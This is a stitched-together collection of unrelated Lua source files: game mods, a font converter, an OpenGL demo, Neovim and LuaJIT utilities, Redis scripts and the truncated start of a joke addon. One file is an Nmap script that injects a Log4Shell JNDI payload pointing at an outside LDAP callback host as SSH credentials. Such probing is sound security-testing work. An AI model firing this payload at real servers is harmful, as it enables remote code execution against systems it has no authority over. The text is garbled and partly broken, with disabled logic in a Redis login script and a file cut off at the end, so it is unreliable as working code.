local os_time = os.time
local math_floor = math.floor
local runtime_check = 0
local events = {}
local scheduled = {_count = 0, _pointer = 1}
local paused = false
local runtime_threshold = 30
local _paused = false
local function runScheduledEvents()
local count, pointer = scheduled._count, scheduled._pointer
local data
while pointer <= count do
data = scheduled[pointer]
-- An event can have up to 5 arguments. In this case, this is faster than table.unpack.
data[1](data[2], data[3], data[4], data[5], data[6])
pointer = pointer + 1
if runtime >= runtime_threshold then
scheduled._count = count
scheduled._pointer = pointer
return false
end
end
scheduled._pointer = pointer
return true
end
local function emergencyShutdown(limit_players, keep_webhooks)
if limit_players then
translatedChatMessage("emergency_mode")
tfm.exec.setRoomMaxPlayers(1)
end
tfm.exec.disableAutoNewGame(true)
tfm.exec.disableAfkDeath(true)
tfm.exec.disablePhysicalConsumables(true)
tfm.exec.disableMortCommand(true)
tfm.exec.disableAutoShaman(true)
tfm.exec.newGame(7685178)
tfm.exec.setGameTime(99999)
for _, event in next, events do
event._count = 0
end
if keep_webhooks and next_file_load then
if room.name == "*#parkour0maps" then
send_bot_room_crash()
else
events.Loop._count = 1
events.Loop[1] = function()
if os.time() >= next_file_load then
system.loadFile(file_id)
next_file_load = os.time() + math.random(60500, 63000)
end
end
events.FileLoaded._count = 1 -- There's already a decode/encode.
events.SavingFile._count = 2
events.SavingFile[2] = function()
events.Loop._count = 0
events.FileLoaded._count = 0
events.SavingFile._count = 0
events.GameDataLoaded._count = 0
end
events.GameDataLoaded._count = 1
events.GameDataLoaded[1] = function(data)
local now = os.time()
if not data.webhooks or os.time() >= data.webhooks[1] then
data.webhooks = {math.floor(os.time()) + 300000} -- 5 minutes
end
local last = #data.webhooks
for index = 1, webhooks._count do
data.webhooks[last + index] = webhooks[index]
end
webhooks._count = 0
end
end
end
end
function onEvent(name, callback)
local evt
if events[name] then
evt = events[name]
else
evt = {_count = 0}
events[name] = evt
-- An event can have up to 5 arguments. In this case, this is faster than `...`
local function caller(when, a, b, c, d, e)
for index = 1, evt._count do
evt[index](a, b, c, d, e)
if os_time() >= when then
break
end
end
end
local schedule = name ~= "Loop" and name ~= "Keyboard" -- schedule everything but eventLoop and eventKeyboard
local done, result
local event_fnc
event_fnc = function(a, b, c, d, e)
local start = os_time()
local this_check = math_floor(start / 4000)
if runtime_check < this_check then
runtime_check = this_check
runtime = 0
paused = false
if not runScheduledEvents() then
runtime_check = this_check + 1
paused = true
return
end
if _paused then
translatedChatMessage("resumed_events")
_paused = false
webhooks._count = webhooks._count + 1
webhooks[webhooks._count] = "**`[CODE]:`** `" .. tfm.get.room.name .. "` is now resumed."
end
elseif paused then
if schedule then
scheduled._count = scheduled._count + 1
scheduled[scheduled._count] = {event_fnc, a, b, c, d, e}
end
return
end
done, result = pcall(caller, start + runtime_threshold - runtime, a, b, c, d, e)
if not done then
local args = json.encode({a, b, c, d, e})
translatedChatMessage("code_error", nil, name, "", args, result)
tfm.exec.chatMessage(result)
webhooks._count = webhooks._count + 1
webhooks[webhooks._count] = "**`[CRASH]:`** `" .. tfm.get.room.name .. "` has crashed. <@212634414021214209>: `" .. name .. "`, `" .. result .. "`"
return emergencyShutdown(true, true)
end
runtime = runtime + (os_time() - start)
if runtime >= runtime_threshold then
if not _paused then
translatedChatMessage("paused_events")
webhooks._count = webhooks._count + 1
webhooks[webhooks._count] = "**`[CODE]:`** `" .. tfm.get.room.name .. "` has been paused."
end
runtime_check = this_check + 1
paused = true
_paused = true
scheduled._count = 0
scheduled._pointer = 1
end
end
_G["event" .. name] = event_fnc
end
evt._count = evt._count + 1
evt[evt._count] = callback
end
end
|
require("apps").default_paths() -- default search paths so things can easily be found
local utf8=require("utf8")
local wgrd=require("wetgenes.grd")
local wpack=require("wetgenes.pack")
local wstring=require("wetgenes.string")
local bitdown=require("wetgenes.gamecake.fun.bitdown")
local funfont64=require("funfont64")
-- create psf files for all the funfont sizes and styles
--[[
#define PSF2_MAGIC0 0x72
#define PSF2_MAGIC1 0xb5
#define PSF2_MAGIC2 0x4a
#define PSF2_MAGIC3 0x86
/* bits used in flags */
#define PSF2_HAS_UNICODE_TABLE 0x01
/* max version recognized so far */
#define PSF2_MAXVERSION 0
/* UTF8 separators */
#define PSF2_SEPARATOR 0xFF
#define PSF2_STARTSEQ 0xFE
struct psf2_header {
unsigned char magic[4];
unsigned int version;
unsigned int headersize; /* offset of bitmaps in file */
unsigned int flags;
unsigned int length; /* number of glyphs */
unsigned int charsize; /* number of bytes for each character */
unsigned int height, width; /* max dimensions of glyphs */
/* charsize = height * ((width + 7) / 8) */
};
]]
local create_psf=function( glyphs , xh , yh )
-- local length=0
-- for idx=0,255 do if glyphs[ idx ] then length=length+1 end end
local length=256
local xpad=math.floor((xh+7)/8)*8
local bitmapsize=(xpad/8)*yh
local getbitmap=function(str)
local ls=wstring.split(str,"\n")
local t={}
local tx=0
local pushend=function()
if tx%8 ~= 0 then --pad
t[#t]=t[#t]*(2^(8-(tx%8)))
end
tx=0
end
local pushbit=function(b)
if tx%8==0 then
t[#t+1]=0
end
t[#t]=(t[#t]*2)+(b and 1 or 0)
tx=tx+1
end
for y=1,yh do
local s=ls[y] or ""
local b=0
for x=1,xh do
pushbit( s:sub(x*2-1,x*2-1) == "7" )
end
pushend()
end
return wpack.save_array(t,"u8")
end
local header=wpack.save_array(
{
0x864ab572,
0,
8*4,
1,
length,
bitmapsize,
yh,xh,
},"u32")
local datas={}
local codes={}
-- font is drawn as ISO 8859-15 , so this maps us back to unicode , may need to add in more chars?
local unimap={
[0xa4]=0x20ac,
[0xa6]=0x0160,
[0xa8]=0x0161,
[0xb4]=0x017d,
[0xb8]=0x017e,
[0xbc]=0x0152,
[0xbd]=0x0153,
[0xbe]=0x0178,
[0x7f]=0x25A0, -- black box
}
for idx=0,255 do
local g = glyphs[ idx ]
-- if g then
datas[#datas+1]=getbitmap(g or "")
codes[#codes+1]=utf8.char(unimap[idx] or idx)..string.char(0xFF)
-- end
end
return header..table.concat(datas)..table.concat(codes)
end
local writefont=function(fname,dat,w,h)
local fp=io.open(fname,"wb")
local fd=create_psf( dat , w , h )
fp:write(fd)
fp:close()
end
-- this font size is only possible as bold
writefont("./funfont_4x8b.psf", funfont64.data4x8 , 4 , 8 )
-- but here we have a choice
writefont("./funfont_8x16b.psf",funfont64.data8x16 , 8 , 16 )
writefont("./funfont_8x16r.psf",funfont64.data8x16r , 8 , 16 )
writefont("./funfont_8x16i.psf",funfont64.data8x16i , 8 , 16 )
|
local shortport = require "shortport"
local stdnse = require "stdnse"
local libssh2_util = require "libssh2-utility"
description = [[
Performs username and password as log4shell payload against SSH server.
]]
---
-- @usage
-- nmap -p 22 --script ssh-log4shell --script-args log4shell.payload=log4shell.payload="${jndi:ldap://{{target}}.xxxx.burpcollaborator.net
--
-- @args ssh-log4shell.timeout Connection timeout (default: "5s")
author = "Vlatko Kosturjak"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {
'intrusive',
'log4shell'
}
-- portrule = shortport.ssh
portrule = shortport.port_or_service( {22}, {"ssh"}, "tcp", "open")
local arg_timeout = stdnse.get_script_args(SCRIPT_NAME .. ".timeout") or "5s"
local payload = stdnse.get_script_args(SCRIPT_NAME..".payload")
local gpayload = stdnse.get_script_args("log4shell.payload")
if not payload then
if not gpayload then
payload = "${jndi:ldap://mydomain/uri}"
stdnse.debug1("Setting the payload to default payload:"..payload)
else
payload=gpayload
end
end
local function password_auth_allowed (host, port)
local helper = libssh2_util.SSHConnection:new()
if not helper:connect(host, port) then
return "Failed to connect to ssh server"
end
local methods = helper:list "root"
if methods then
for _, value in pairs(methods) do
if value == "password" then
return true
end
end
end
return false
end
function action (host, port)
local timems = stdnse.parse_timespec(arg_timeout) --todo: use this!
local ssh_timeout = 1000 * timems
if password_auth_allowed(host, port) then
local options = {
ssh_timeout = ssh_timeout,
}
target = host.ip .. "-" .. port.number
payload = payload:gsub("{{target}}", target)
stdnse.debug1("Final payload:"..payload)
helper = libssh2_util.SSHConnection:new()
local status, err = helper:connect_pcall(host, port)
if not status then
stdnse.debug(2, "libssh2 error: %s", helper.session)
return
elseif not helper.session then
stdnse.debug(2, "failure to connect: %s", err)
return
else
helper:set_timeout(options.ssh_timeout)
end
username = payload
password = payload
stdnse.debug(1, "sending payload: %s", payload)
local status, resp = helper:password_auth(username, password)
if status then
return "Password as payload succeeded. Weird"
end
helper:disconnect()
else
return "Password authentication not allowed"
end
end
|
CustomizableWeaponry:addFireSound("CW_M1014_FIRE", "weapons/bf4_1014/shottie-1.wav", 1, 115, CHAN_STATIC)
CustomizableWeaponry:addReloadSound("CW_M1014_PUMP", "weapons/bf4_1014/pull.wav")
CustomizableWeaponry:addReloadSound("CW_M1014_INSERT", "weapons/bf4_1014/insert.wav")
CustomizableWeaponry:addReloadSound("CW_M3SUPER90_HANDLE", "weapons/cw_m3/handle.wav") |
require("iuplua")
require("iupluagl")
require("luagl")
require("luaglu")
require("imlua")
--filename = [[C:\LUA\im-3.8.2_Win32_dllw4_lib\im-3.8.2_Examples\im\html\examples\flower.jpg]]
filename =[[flower.jpg]]
heightfac=math.sqrt(3)*0.5 -- ratio from height to side in equilateral triangle
iup.key_open()
texture = 0
cnv = iup.glcanvas{buffer="DOUBLE", rastersize = "640x480"}
function cnv:resize_cb(width, height)
iup.GLMakeCurrent(self)
gl.Viewport(0, 0, width, height)
gl.MatrixMode('PROJECTION') -- Select The Projection Matrix
gl.LoadIdentity() -- Reset The Projection Matrix
if height == 0 then -- Calculate The Aspect Ratio Of The Window
height = 1
end
gl.Ortho(0, width, height,0, 0.0, 500);
gl.MatrixMode('MODELVIEW') -- Select The Model View Matrix
gl.LoadIdentity() -- Reset The Model View Matrix
end
function EQtriang(dummy,wi)
gl.PushMatrix()
gl.Scale(wi,wi,1)
gl.Begin('TRIANGLES') -- Drawing Using Triangles
gl.TexCoord(0.5, 1) gl.Vertex( 0.5, math.sqrt(3)*0.5, 0) -- Top
gl.TexCoord(0, 0) gl.Vertex(0, 0, 0) -- Bottom Left
gl.TexCoord(1, 0) gl.Vertex( 1, 0, 0) -- Bottom Right
gl.End() -- Finished Drawing The Triangle
gl.PopMatrix()
end
function TeselR(fun,wi,lev)
local fu = lev > 0 and TeselR or fun
local w = wi*(2^lev)
gl.PushMatrix()
fu(fun,wi,lev-1)
gl.PopMatrix()
gl.PushMatrix()
gl.Translate(1.5*w,heightfac*w,0)
gl.Rotate(120,0,0,1)
fu(fun,wi,lev-1)
gl.PopMatrix()
gl.PushMatrix()
--gl.LoadIdentity() -- Reset The Current Modelview Matrix
gl.Translate(1.5*w,heightfac*w,0)
gl.Rotate(-120,0,0,1)
fu(fun,wi,lev-1)
gl.Rotate(180,1,0,0)
fu(fun,wi,lev-1)
gl.PopMatrix()
end
function cnv:action(x, y)
--local timebegin = os.clock()
--print((self.DRAWSIZE):match("(%d*)x(%d*)"))
local w,h = (self.DRAWSIZE):match("(%d*)x(%d*)")
local endwide = h*2/math.sqrt(3) + w
local cellwide = math.max(10,mouseX)
local iters = math.floor(math.log(endwide/cellwide)/math.log(2))
--print(w,h,endwide,iters)
iup.GLMakeCurrent(self)
gl.Clear('COLOR_BUFFER_BIT,DEPTH_BUFFER_BIT') -- Clear Screen And Depth Buffer
gl.LoadIdentity() -- Reset The Current Modelview Matrix
gl.Translate(-0.5*(endwide -w),0,-40)
gl.BindTexture('TEXTURE_2D', texture[1])
--TeselR(EQtriang,0)
TeselR(EQtriang,cellwide,iters)
iup.GLSwapBuffers(self)
--print("drawtime",os.clock()-timebegin)
end
mouseX,mouseY=0,0
nostatus=(" "):rep(10)
function cnv:motion_cb(x,y,status)
if status == nostatus then
mouseX = x
mouseY = y
iup.Update(cnv)
end
end
function cnv:k_any(c)
if c == iup.K_q or c == iup.K_ESC then
return iup.CLOSE
elseif c == iup.K_F1 then
if fullscreen then
fullscreen = false
dlg.fullscreen = "No"
else
fullscreen = true
dlg.fullscreen = "Yes"
end
iup.SetFocus(cnv)
end
end
function LoadImage(fileName)
local image = im.FileImageLoadBitmap(fileName)
if (not image) then
print ("Unnable to open the file: " .. fileName)
os.exit()
end
local gldata, glformat = image:GetOpenGLData()
gl.PixelStore(gl.UNPACK_ALIGNMENT, 1)
glu.Build2DMipmaps(image:Depth(), image:Width(), image:Height(), glformat, gl.UNSIGNED_BYTE, gldata)
-- gldata will be destroyed when the image object is destroyed
image:Destroy()
end
function cnv:map_cb()
iup.GLMakeCurrent(self)
gl.Enable('TEXTURE_2D') -- Enable Texture Mapping ( NEW )
texture = gl.GenTextures(1) -- Create The Texture
-- Typical Texture Generation Using Data From The Bitmap
gl.BindTexture('TEXTURE_2D', texture[1])
gl.TexParameter('TEXTURE_2D','TEXTURE_MIN_FILTER','LINEAR')
gl.TexParameter('TEXTURE_2D','TEXTURE_MAG_FILTER','LINEAR')
LoadImage(fileName)
end
if arg[1] ~= nil then
fileName = arg[1]
else
fileName = filename --[[C:\LUA\LuaGLsource\luagl\html\examples\luagl.tga]]
end
dlg = iup.dialog{cnv; title="LuaGL Image Texture Loader"}
dlg:show()
cnv.rastersize = nil -- reset minimum limitation
if (not iup.MainLoopLevel or iup.MainLoopLevel()==0) then
iup.MainLoop()
end
|
--[[
调用方式:EVAL(script, 0, operate, username, token, expires, userDetails, authorities)
实现功能:单点登录,指定时间内token自动过期
这里实现登录
4个map
auth:token:username field是token,value是username
auth:username:token field是username,value是token
auth:token:userdetails field是token,value是userdetails
auth:token:authorities field是token,value是authorities
auth:token:login:info field是token,value是额外的登录信息,如设备号、手机操作系统,IP地址等等。使用场景如app登出提示
1个zset
auth:token:ttl 放token即token到期timestamp,zset类型,score是timestamp
]]
local AUTH_USERNAME_TOKEN_HASH = "auth:username:token"
local AUTH_TOKEN_USERNAME_HASH = "auth:token:username"
local AUTH_TOKEN_USERDETAILS_HASH = "auth:token:userdetails"
local AUTH_TOKEN_AUTHORITIES_HASH = "auth:token:authorities"
local AUTH_TOKEN_LOGIN_INFO_HASH = "auth:token:login:info"
local AUTH_TOKEN_TTL_ZSET = "auth:token:ttl"
local AUTH_TOKEN_EXPIRE_CHANNEL = "auth:token:expired"
local OPERATE_LOGIN = "login"
local OPERATE_LOGOUT = "logout"
local OPERATE_AUTH = "auth"
local OPERATE_CLEAR_EXPIRED = "clearExpired"
--[[
1.登录成功后
客户端生成了新的token
- 根据username从auth:username:token获取之前用过的token
- 根据旧token删除auth:token:username中相应的field
- 根据旧token删除auth:token:userdetails中相应的field
- 根据旧token删除auth:token:authorities中相应的field
- 根据旧token从auth:token:ttl中删除
清理完毕
- 用新token设置auth:token:username
- 用新token设置auth:username:token
- 用新token设置auth:token:userdetails
- 用新token设置auth:token:authorities
- 将新token塞入auth:token:ttl,score为token过期时间
]]
local login = function(username, token, expires, userDetails, authorities, loginInfo)
local loginResult = {}
if(not username or not token) then
-- table.insert(loginResult, false)
loginResult["success"] = false
return loginResult
else
loginResult["success"] = true
--table.insert(loginResult, true)
end
local oldToken = redis.call("HGET", AUTH_USERNAME_TOKEN_HASH, username)
redis.replicate_commands()
if(oldToken) then
local lastLoginInfo = redis.call("HGET", AUTH_TOKEN_LOGIN_INFO_HASH, oldToken)
redis.call("HDEL", AUTH_USERNAME_TOKEN_HASH, username)
redis.call("HDEL", AUTH_TOKEN_USERNAME_HASH, oldToken)
redis.call("HDEL", AUTH_TOKEN_USERDETAILS_HASH, oldToken)
redis.call("HDEL", AUTH_TOKEN_AUTHORITIES_HASH, oldToken)
redis.call("HDEL", AUTH_TOKEN_LOGIN_INFO_HASH, oldToken)
redis.call("ZREM", AUTH_TOKEN_TTL_ZSET, oldToken)
loginResult["lastLoginInfo"] = lastLoginInfo;
--table.insert(loginResult, lastLoginInfo)
end
redis.call("HSET", AUTH_USERNAME_TOKEN_HASH, username, token)
redis.call("HSET", AUTH_TOKEN_USERNAME_HASH, token, username)
redis.call("HSET", AUTH_TOKEN_USERDETAILS_HASH, token, userDetails)
redis.call("HSET", AUTH_TOKEN_AUTHORITIES_HASH, token, authorities)
redis.call("HSET", AUTH_TOKEN_LOGIN_INFO_HASH, token, loginInfo)
-- 默认一年过期
-- 当前毫秒数+过期毫秒数
if expires == "-1" then
redis.call("ZADD", AUTH_TOKEN_TTL_ZSET, redis.call("TIME")[1] + 31536000000, token)
else
redis.call("ZADD", AUTH_TOKEN_TTL_ZSET, redis.call("TIME")[1] + expires, token)
end
return cjson.encode(loginResult)
end
--[[
2.登出 返回1表示登出成功 0表示token不存在
- 根据token从auth:token:username获取username
- 根据username删auth:username:token
- 根据token删auth:token:userdetails
- 根据token删auth:token:authorities
- 根据token删auth:token:ttl
]]
local logout = function(token)
local username = redis.call("HGET", AUTH_TOKEN_USERNAME_HASH, token)
if(not username) then
return cjson.encode(false)
end
redis.call("HDEL", AUTH_USERNAME_TOKEN_HASH, username)
redis.call("HDEL", AUTH_TOKEN_USERNAME_HASH, token)
redis.call("HDEL", AUTH_TOKEN_USERDETAILS_HASH, token)
redis.call("HDEL", AUTH_TOKEN_AUTHORITIES_HASH, token)
redis.call("HDEL", AUTH_TOKEN_LOGIN_INFO_HASH, token)
redis.call("ZREM", AUTH_TOKEN_TTL_ZSET, token)
return cjson.encode(true)
end
--[[
根据auth:token:ttl的score,与当前timestamp比较,score<timestamp表示过期了, 超过有效时间范围执行登出操作清理数据,返回expiredTokenLoginInfo
返回一个数组[token, loginInfo, token2, loginInfo2...]
PUBLISH 消息
]]
local clearExpired = function()
local currentTimestamp = redis.call("TIME")[1] -- 得到的是秒
local expiredTokens = redis.call("ZRANGEBYSCORE", AUTH_TOKEN_TTL_ZSET, "-inf", currentTimestamp)
local expiredTokenLoginInfo = {}
-- 没有token过期
if(#expiredTokens == 0) then
return expiredTokenLoginInfo
end
redis.replicate_commands()
for key, token in ipairs(expiredTokens) do
-- loginInfo 是json字符串
local loginInfo = redis.call("HGET", AUTH_TOKEN_LOGIN_INFO_HASH, token)
return token
--logout(token)
--expiredTokenLoginInfo[token] = loginInfo
end
-- PUBLISH 只接受数字或者字符串,expiredTokenLoginInfo是table,所以转成json字符串
local expiredTokenInfos = cjson.encode(expiredTokenLoginInfo);
redis.call("PUBLISH", AUTH_TOKEN_EXPIRE_CHANNEL, expiredTokenInfos)
return expiredTokenInfos
end
--[[
3.验证token
- 根据提供的token从auth:token:username中取username,取不到则验证失败
- 返回username
]]
local auth = function(token)
clearExpired() --已经过期的token列表
return redis.call("HGET", AUTH_TOKEN_USERNAME_HASH, token)
end
local operate = ARGV[1]
if operate == OPERATE_LOGIN then
local username = ARGV[2]
local token = ARGV[3]
local expires = ARGV[4]
local userDetails = ARGV[5]
local authorities = ARGV[6]
local loginInfo = ARGV[7]
-- return username .. ", "..token .. ", "..expires .. ", "..userDetails ..", ".. authorities
--return login(username, token, expires, userDetails, authorities, loginInfo)
elseif operate == OPERATE_LOGOUT then
local token = ARGV[2]
return logout(token)
elseif operate == OPERATE_AUTH then
local token = ARGV[2]
return auth(token)
elseif operate == OPERATE_CLEAR_EXPIRED then
return clearExpired()
end |
VictoryState = class{__includes = BaseState}
function VictoryState:enter(params)
self.level = params.level
self.score = params.score
self.paddle = params.paddle
self.health = params.health
self.ball = params.ball
self.highScores = params.highScores
end
function VictoryState:update(dt)
self.paddle:update(dt)
-- have the ball track the player
self.ball.x = self.paddle.x + (self.paddle.width / 2) - 4
self.ball.y = self.paddle.y - 8
-- go to play screen if the player presses Enter
if love.keyboard.wasPressed("enter") or love.keyboard.wasPressed("return") then
stateMachine:change("serve", {
level = self.level + 1,
bricks = LevelMaker.createMap(self.level + 1),
paddle = self.paddle,
health = self.health,
score = self.score,
highScores = self.highScores,
})
end
end
function VictoryState:render()
self.paddle:render()
self.ball:render()
renderHealth(self.health)
renderScore(self.score)
-- level complete text
love.graphics.setFont(fonts["large"])
love.graphics.printf("Level " .. tostring(self.level) .. " complete!", 0, VIRTUAL_HEIGHT / 4, VIRTUAL_WIDTH, "center")
-- instructions text
love.graphics.setFont(fonts["medium"])
love.graphics.printf("Press Enter to serve!", 0, VIRTUAL_HEIGHT / 2, VIRTUAL_WIDTH, "center")
end
|
local currentPlayer = GetPlayerPed(-1)
local speedcams = {} --object size speed
local units = 3.6 --kmh
--local units = 2.23694 --mph
TriggerEvent('chat:addSuggestion', '/create', 'creates a speedtrap', {
{ name="size", help="size of the speedtrap" },
{ name="speed", help="speed on which to trigger" }
})
function HasMissingArgs(args)
if args[1] == nil then
TriggerEvent('chat:addMessage', { color = { 255, 0, 0}, multiline = true, args = {"Error", "Missing [size] argument for the speedtrap."} })
return true
end
if args[2] == nil then
TriggerEvent('chat:addMessage', { color = { 255, 0, 0}, multiline = true, args = {"Error", "Missing [speed] argument for the speedtrap."} })
return true
end
return false
end
RegisterCommand('create', function(source, args, rawCommand)
if HasMissingArgs(args) then
return
end
-- Create object
local hash = GetHashKey("prop_cs_cctv")
RequestModel(hash)
while not HasModelLoaded(hash)
do
Citizen.Wait(0)
end
local pos = GetOffsetFromEntityInWorldCoords(currentPlayer, 0.0, 0, -1.0)
object = CreateObject(hash, pos.x, pos.y, pos.z, true, true)
-- View direction
SetEntityHeading(object, GetEntityHeading(currentPlayer))
-- Flip upside down
local rotation = GetEntityRotation(object, 2)
SetEntityRotation(object, rotation.x, rotation.y+180, rotation.z+180, 0, true)
-- Persist
SetEntityAsMissionEntity(object, true, true)
local blip = AddBlipForEntity(object)
speedcam = { cam = object, size = tonumber(args[1]) + .0, speed = tonumber(args[2]), blip = blip }
speedcams[#speedcams+1] = speedcam
end)
function GetSpeed()
local vehicle = GetVehiclePedIsIn(currentPlayer, false)
local speed = GetEntitySpeed(vehicle)
return math.floor(speed*units, 2)
end
function SpeedTrapTriggered(speedcam, speed)
--add whatever
end
Citizen.CreateThread(function()
while true do
Citizen.Wait(0)
for i, obj in ipairs(speedcams) do
local trapPos = GetEntityCoords(obj.cam)
DrawMarker(1, trapPos.x, trapPos.y, trapPos.z + 2, 0.0, 0.0, 0.0, 0.0, 180.0, 0.0, obj.size, obj.size, obj.size, 255, 0, 0, 50, false, true, 2, nil, nil, false)
local playerPos = GetEntityCoords(currentPlayer);
local vehSpeed = GetSpeed()
if(IsPedInAnyVehicle(currentPlayer)
and GetDistanceBetweenCoords(trapPos, playerPos, true) < obj.size / 2
and vehSpeed > obj.speed) then
SpeedTrapTriggered(obj, vehSpeed)
end
end
end
end)
|
-- Code created by Kwik - Copyright: kwiksher.com {{year}}
-- Version: {{vers}}
-- Project: {{ProjName}}
--
local _Command = {}
local _K = require "Application"
-----------------------------
-----------------------------
function _Command:new()
local command = {}
--
function command:execute(params)
local event = params.event
if event=="init" then
_K.kwk_readMe = 0
_K.kBidi = {{use.bidi}}
_K.kAutoPlay = 0
_K.goPage = {{curPage}}
end
end
return command
end
--
return _Command |
local defaults = require'hop.defaults'
local M = {}
-- Get the first key of a key set.
local function first_key(keys)
return keys:sub(1, 1)
end
-- Get the next key of the input key in the input key set, if any, or return nil.
local function next_key(keys, key)
local i = keys:find(key)
if i == #keys then
return nil
end
local i1 = i + 1
return keys:sub(i1, i1)
end
-- Generate the next permutation.
--
-- term_keys is the terminal key set, seq_keys is the sequence key set and perm is the permutation for which we want
-- the next one.
--
-- The way this works is by incrementing a permutation as long it its terminal key has a next available key. A sequence
-- key is a key in the last ¼ part of the initial key set. For instance, for keys = "abcdefghijklmnop", "mnop" is the
-- last ¼ part, so those keys will be used as sequence keys. The invariant is that, terminal sequences cannot share
-- their last key with non-terminal sequences on the same level. The following are then not possible (given the example
-- keys from above):
--
-- - "a", "ab": not possible because even though "b" is okay, "a" is terminal for the first sequence, so it cannot be
-- used in the second.
-- - "a", "ma", "mb", mc": okay, as "a" is not shared on the same level.
-- - "pnac": without even going any further, this sequence is not possible as "a" is only used in terminal sequences, so
-- this "pnac" sequence would collide with the correct "pna" sequence.
--
-- Yet an another – easier – way to picture the idea is that any key from the terminal key set can only appear at the end
-- of sequence, and any key from the sequence key set can only appear before a terminal key in a sequence.
local function next_perm(term_keys, seq_keys, perm)
local perm_len = #perm
if perm_len == 0 then
return { first_key(term_keys) }
end
-- try to increment the terminal key; if it’s possible, then we can directly return the permutation as it’s the next
-- one
local term_key = next_key(term_keys, perm[perm_len])
if term_key then
perm[perm_len] = term_key
return perm
end
-- perm was the last permutation for the current sequence keys, so we need to backtrack and increment sequence keys
-- until one of them has a successor
for i = perm_len - 1, 1, -1 do
-- increment the sequence key; if it’s possible, then we have found the next permutation
local seq_key = next_key(seq_keys, perm[i])
if seq_key then
-- set the terminal key to the first terminal key as we’re starting a new sequence
perm[perm_len] = first_key(term_keys)
perm[i] = seq_key
return perm
else
-- the current sequence key doesn’t have a successor, so we set it back to the first sequence key because we will
-- start a new sequence key either incrementing a parent of the current sequence key, or we will make a complete
-- new permutation by incrementing its dimension
perm[i] = first_key(seq_keys)
end
end
-- we need to increment the dimension
perm[perm_len] = first_key(seq_keys)
perm[perm_len + 1] = first_key(term_keys)
return perm
end
-- Get the first N permutations for a given set of keys.
--
-- Permutations are sorted by dimensions, so you will get 1-perm first, then 2-perm, 3-perm, etc. depending on the size
-- of the keys.
function M.permutations(keys, n, opts)
local quarter = #keys * opts.term_seq_bias
local term_keys = keys:sub(1, quarter)
local seq_keys = keys:sub(quarter + 1)
local perms = {}
local perm = {}
for _ = 1, n do
perm = next_perm(term_keys, seq_keys, perm)
perms[#perms + 1] = vim.deepcopy(perm)
end
return perms
end
return M
|
local ffi = require "ffi"
local bit = require "bit"
local band = bit.band
local bor = bit.bor
local rshift = bit.rshift
local lshift = bit.lshift
ffi.cdef[[
void * malloc ( size_t size );
void free ( void * ptr );
void * realloc ( void * ptr, size_t size );
]]
function bzero(dest, nbytes)
ffi.fill(dest, nbytes)
return dest
end
function bcopy(src, dest, nbytes)
ffi.copy(dest, src, nbytes)
end
function bcmp(ptr1, ptr2, nbytes)
for i=0,nbytes do
if ptr1[i] ~= ptr2[i] then return -1 end
end
return 0
end
function memset(dest, c, len)
ffi.fill(dest, len, c)
return dest
end
function memcpy(dest, src, nbytes)
ffi.copy(dest, src, nbytes)
end
function memcmp(ptr1, ptr2, nbytes)
local p1 = ffi.cast("const uint8_t *", ptr1)
local p2 = ffi.cast("const uint8_t *", ptr2)
for i=0,nbytes do
if p1[i] ~= p2[i] then return -1 end
end
return 0
end
function memchr(ptr, value, num)
local p = ffi.cast("const uint8_t *", ptr)
for i=0,num-1 do
if p[i] == value then return p+i end
end
return nil
end
function memmove(dst, src, num)
local srcptr = ffi.cast("const uint8_t*", src)
-- If equal, just return
if dst == srcptr then return dst end
if srcptr < dst then
-- copy from end
for i=num-1,0, -1 do
dst[i] = srcptr[i];
end
else
-- copy from beginning
for i=0,num-1 do
dst[i] = srcptr[i];
end
end
return dst
end
local function memreverse(buff, bufflen)
local i = 0;
local tmp
while (i < (bufflen)/2) do
tmp = buff[i];
buff[i] = buff[bufflen-i-1];
buff[bufflen-i-1] = tmp;
i = i + 1;
end
return buff
end
local function getreverse(src, len)
if not len then
if type(src) == "string" then
len = #src
else
return nil, "unknown length"
end
end
local srcptr = ffi.cast("const uint8_t *", src);
local dst = ffi.new("uint8_t[?]", len)
for i = 0, len-1 do
dst[i] = srcptr[len-1-i];
end
return dst, len
end
return {
bcmp = bcmp,
bcopy = bcopy,
bzero = bzero,
memchr = memchr,
memcpy = memcpy,
memcmp = memcmp,
memmove = memmove,
memset = memset,
memreverse = memreverse,
}
|
local _tonumber = tonumber
local _tostring = tostring
local _unpack = unpack
local clientRoomName = KEYS[1]
local currentTime = _tonumber(redis.call('get', 'serverTime'))
if(not currentTime) then
return redis.error_reply('NO SERVERTIME')
end
local rk = {
roomInfo = "rooms|"..KEYS[1].."|info",
roomBots = "rooms|"..KEYS[1].."|bots",
}
local doesRoomExist
local botData = {}
local roomBots = {}
local roomBotInfo, isNumeric, dbgWarning
doesRoomExist = redis.call('exists', rk.roomInfo) == 1
if(not doesRoomExist) then
return redis.error_reply('NOT EXIST')
end
local infoKeys = {'roomName','bots','maxBots', 'maxSubscribers', 'subscribers'}
roomBotInfo = redis.call('hmget', rk.roomInfo, _unpack(infoKeys))
for x=1, #roomBotInfo do
isNumeric = _tonumber(roomBotInfo[x])
botData[infoKeys[x]] = isNumeric and isNumeric or _tostring(roomBotInfo[x])
end
--double check maxBots to maxSubscribers to ensure at least one space open when maxBots => maxSubscribers
if(botData and botData.maxBots and botData.maxSubscribers and botData.maxSubscribers <= botData.maxBots and botData.maxSubscribers > 0) then
--needs to be at least one open spot for a normal user to enter
dbgWarning = "["..clientRoomName.."] maxBots decreased from "..botData.maxBots.. " to "..botData.maxSubscribers-1
botData.maxBots = botData.maxSubscribers-1
elseif((botData.subscribers - botData.bots) <= 0) then
botData.maxBots = 0
end
roomBots = redis.call('smembers', rk.roomBots)
return cjson.encode({
roomName = clientRoomName,
botData = botData,
bots = roomBots,
dbgWarning = dbgWarning
})
|
-- * _JOKER_VERSION: 0.0.1 ** Please do not modify this line.
--[[----------------------------------------------------------
Joker - Jokes, Riddles, Fun Facts, & Other Tomfoolery
----------------------------------------------------------
*
* ADDING YOUR OWN JOKES:
* Be aware that modifying this file incorrectly could break Joker,
* so for normal users I recommend just compiling your jokes in the
* '_MyCustomJokes.lua' file instead.
*
* COMPILATION: Cheesy pickup lines
*
* INCLUDES MULTIPLE!
* Joker.PickupLines{} - Cheesy and cute (mostly clean),
* Joker.PickupLinesXXX{} - Adult/R-Rated,
* Joker.PickupLinesHP{} - Harry Potter
*
* SOURCES:
* http://jokes4us.com,
* http://laggfagg.com,
* http://mashable.com,
* http://buzzfeed.com,
* Reddit Search,
* Google Search
]]--
JokerData = JokerData or {}
JokerData.Config = JokerData.Config or {}
JokerData.Config.PickupLines = {
command = "pickup",
label = "Pickup Lines",
